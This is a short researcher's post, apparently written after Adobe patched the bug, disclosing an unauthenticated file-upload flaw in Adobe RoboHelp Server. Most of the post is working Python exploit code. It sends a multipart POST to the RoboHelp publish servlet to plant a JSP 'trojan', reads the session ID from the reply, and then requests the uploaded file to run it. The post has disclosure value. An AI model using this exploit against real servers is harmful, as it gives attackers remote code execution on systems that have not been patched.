Looks like our Adobe RoboHelp bug has been fixed – http://www.adobe.com/support/security/bulletins/apsb09-14.html
Interesting enough, this bug has been independently discovered and reported via ZDI – http://www.zerodayinitiative.com/advisories/ZDI-09-066/
I found this bug at the beginning of April, 2009.
Below are some details about it.
The following request to RoboHelpServer servlet creates a file on a vulnerable machine:
b="-----------------------------111\r\n" b+="Content-Disposition: form-data; name=\"filename\"; filename=\"test.jsp\"\r\n" b+="Content-Type: application/x-java-archive\r\n\r\n" b+=data # source code of our JSP trojan here b+="\r\n" b+="-----------------------------111--\r\n" s="POST /robohelp/server?PUBLISH=1 HTTP/1.1\r\n" s+="Host: %s:%d\r\n"%(host, port) s+="User-Agent: Mozilla\r\n" s+="UID: 1234\r\n" s+="Content-Type: multipart/form-data; boundary=---------------------------111\r\n" s+="Content-Length: %d\r\n"%len(b) s+="\r\n" s+=b sock.sendall(s) reply=sock.recv(4000)
After we have to parse the reply, find out the value of “sessionid” header and save it into session_id variable.
Now we can execute our jsp trojan-
s="GET /robohelp/robo/reserved/web/%s/test.jsp HTTP/1.0\r\n\r\n" % session_id sock.sendall(s)